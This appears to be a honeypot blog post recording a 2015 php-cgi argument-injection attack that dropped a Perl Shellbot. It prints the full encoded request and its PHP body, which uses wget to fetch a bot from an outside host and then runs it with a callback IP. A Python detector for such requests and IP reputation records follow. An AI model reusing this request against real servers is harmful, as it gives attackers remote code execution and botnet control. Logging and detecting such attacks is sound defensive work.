Saturday, 25 July 2015

Compromise attempt (Perl Shellbot) - 128.41.128.44

BEGIN OF HTTP DATA:
2015-07-24 13:15:21
Source IP: 128.41.128.44
Country: GB RiskScore: 7.1 Malware: []
POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: 195.169.125.87
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Content-Type: application/x-www-form-urlencoded
Content-Length: 204

<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("wget 194.60.242.251/minispeedtest/speedtest/.z/hb/plk03 -O /tmp/.0e1bc.log;perl /tmp/.0e1bc.log 188.165.44.137;rm -rf /tmp/.0e1bc.log;"); ?>
END OF DATA

The decoded URL, which passes php-cgi options (-d ... -n) in the query string, looks like:
 /phppath/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-n
The file actually downloaded is a Perl-based Shellbot.
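As an added example (not code from the original post), the following Python decodes a request line the way php-cgi builds its argv from the query string and flags the ini overrides seen above; the request line is the one captured by the honeypot, re-joined onto one line, and the function and dictionary names are my own.

```python
import re
from urllib.parse import unquote

# Ini directives that, pushed through the query string, turn php-cgi into a
# code-execution primitive (the combination seen in the captured request).
RISKY = {"allow_url_include", "auto_prepend_file", "safe_mode",
         "disable_functions", "open_basedir", "suhosin.simulation"}

def php_cgi_argv(target):
    """Split a request target as php-cgi turns a query string into argv:
    '+' separates arguments, each is percent-decoded, and the query is only
    treated as argv when it contains no literal '=' (an encoded %3D slips past)."""
    path, _, query = target.partition("?")
    if "=" in query:
        return unquote(path), []
    return unquote(path), [unquote(a) for a in query.split("+") if a]

def analyze_request_line(line):
    """Return a verdict dict for one HTTP request line from a web or honeypot log."""
    m = re.match(r"^(\w+)\s+(\S+)\s+HTTP/\d\.\d$", line.strip())
    if not m:
        return {"suspicious": False, "reason": "not a request line"}
    path, argv = php_cgi_argv(m.group(2))
    overrides = {}
    i = 0
    while i < len(argv):
        if argv[i] == "-d" and i + 1 < len(argv):   # pair each -d with its key=value
            key, _, val = argv[i + 1].partition("=")
            overrides[key] = val
            i += 2
        else:
            i += 1
    return {
        "path": path,
        "ini_overrides": overrides,
        "ignores_php_ini": "-n" in argv,
        "risky": sorted(k for k in overrides if k in RISKY),
        # any -d reaching php-cgi via the query string is argument injection;
        # auto_prepend_file=php://input means the POST body is executed as PHP
        "suspicious": bool(overrides),
        "rce_via_body": overrides.get("auto_prepend_file") == "php://input",
    }

# Constructed sample: the honeypot's request line from this post, joined onto one line.
SAMPLE = (
    "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%"
    "64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F"
    "%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1"
)

if __name__ == "__main__":
    print(analyze_request_line(SAMPLE))
```

Run over an access log, any line with a non-empty "risky" list deserves an alert, and a matching POST body (as in the capture above) is the payload to preserve for analysis.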


  • 188.165.44.137: the address the downloaded script is told to connect to (passed as its argument in the command)
    {
       "categoryDescriptions": {},
       "cats": {},
       "geo": {
          "country": "France",
          "countrycode": "FR"
       },
       "ip": "188.165.44.137",
       "reason": "Regional Internet Registry",
       "reasonDescription": "One of the five RIRs announced a (new) location mapping of the IP.",
       "score": 1,
       "subnets": [
          {
             "categoryDescriptions": {},
             "cats": {},
             "created": "2012-03-22T07:26:00.000Z",
             "geo": {
                "country": "France",
                "countrycode": "FR"
             },
             "ip": "188.165.0.0",
             "reason": "Regional Internet Registry",
             "reasonDescription": "One of the five RIRs announced a (new) location mapping of the IP.",
             "score": 1,
             "subnet": "188.165.0.0/16"
          }
       ]
    }

  • 194.60.242.251: the download host (the wget source)
    {
       "categoryDescriptions": {
          "Scanning IPs": "These IPs have been identified as illegally scanning networks for vulnerabilities."
       },
       "cats": {
          "Scanning IPs": 14
       },
       "geo": {
          "country": "Ukraine",
          "countrycode": "UA"
       },
       "ip": "194.60.242.251",
       "reason": "Firewall deny log analysis",
       "reasonDescription": "This IP was involved in port scanning activities.",
       "score": 1.4,
       "subnets": [
          {
             "categoryDescriptions": {},
             "cats": {},
             "created": "2012-03-22T07:26:00.000Z",
             "geo": {
                "country": "Ukraine",
                "countrycode": "UA"
             },
             "ip": "194.60.242.0",
             "reason": "Regional Internet Registry",
             "reasonDescription": "One of the five RIRs announced a (new) location mapping of the IP.",
             "score": 1,
             "subnet": "194.60.242.0/24"
          }
       ]
    }
  • 194.24.228.203: the IP hardcoded in the bot
    {
       "categoryDescriptions": {},
       "cats": {},
       "geo": {
          "country": "France",
          "countrycode": "FR"
       },
       "ip": "194.24.228.203",
       "reason": "Regional Internet Registry",
       "reasonDescription": "One of the five RIRs announced a (new) location mapping of the IP.",
       "score": 1,
       "subnets": [
          {
             "categoryDescriptions": {},
             "cats": {},
             "created": "2012-03-22T07:26:00.000Z",
             "geo": {
                "country": "France",
                "countrycode": "FR"
             },
             "ip": "194.24.228.0",
             "reason": "Regional Internet Registry",
             "reasonDescription": "One of the five RIRs announced a (new) location mapping of the IP.",
             "score": 1,
             "subnet": "194.24.228.0/23"
          }
       ]
    }